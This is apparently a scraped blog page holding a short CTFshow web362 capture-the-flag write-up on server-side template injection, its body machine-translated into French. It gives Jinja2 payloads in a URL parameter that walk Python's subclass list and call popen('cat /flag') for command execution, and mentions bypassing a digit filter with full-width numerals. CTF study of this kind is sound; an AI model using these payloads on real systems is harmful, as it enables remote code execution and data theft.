当前位置:网站首页>Ctfshow - web362 (ssti)
Ctfshow - web362 (ssti)
2022-04-23 18:29:00 【M0 62094846】

?name={
{"".__class__.__bases__[0].__subclasses__()}}
C'est normal jusqu'ici.
De12 Ça ne marchera plus. 
Il y a un problème avec les chiffres ,Regarde.wp Contournement avec un nombre plein angle au lieu d'un nombre normal

?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
Il devrait alors être possible de le faire normalement
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

版权声明
本文为[M0 62094846]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- Correct opening method of option
- Mysqldump backup database
- 机器学习理论之(7):核函数 Kernels —— 一种帮助 SVM 实现非线性化决策边界的方式
- Use bitnami / PostgreSQL repmgr image to quickly set up PostgreSQL ha
- QT add external font ttf
- QT curve / oscilloscope customplot control
- Realization of consumer gray scale
- Test questions of daily safety network (February 2024)
- Differences between SSD hard disk SATA interface and m.2 interface (detailed summary)
- 函数递归以及趣味问题的解决
猜你喜欢

From source code to executable file

Use stm32cube MX / stm32cube ide to generate FatFs code and operate SPI flash

Docker installation MySQL

【ACM】509. 斐波那契数(dp五部曲)

Qt读写XML文件(含源码+注释)

Analysez l'objet promise avec le noyau dur (Connaissez - vous les sept API communes obligatoires et les sept questions clés?)

Closure type of rust (difference between FN, fnmut and fnone)

Halo open source project learning (VII): caching mechanism

QT add external font ttf

Nodejs installation
随机推荐
STM32 learning record 0008 - GPIO things 1
How to ensure the security of futures accounts online?
Robocode tutorial 7 - Radar locking
CISSP certified daily knowledge points (April 13, 2022)
Ucosiii transplantation and use, reference punctual atom
机器学习理论之(8):模型集成 Ensemble Learning
Box pointer of rust
Interpretation and compilation of JVM
According to the result set queried by SQL statement, it is encapsulated as JSON
玻璃体中的硫酸软骨素
Function recursion and solving interesting problems
Deep learning classic network analysis and target detection (I): r-cnn
Test post and login function
多功能工具箱微信小程序源码
Ionic 从创建到打包指令集顺序
Const keyword, variable and function are decorated with const
MySQL auto start settings start with systemctl start mysqld
If condition judgment in shell language
Reptile efficiency improvement method
ESP32 LVGL8. 1 - event (event 17)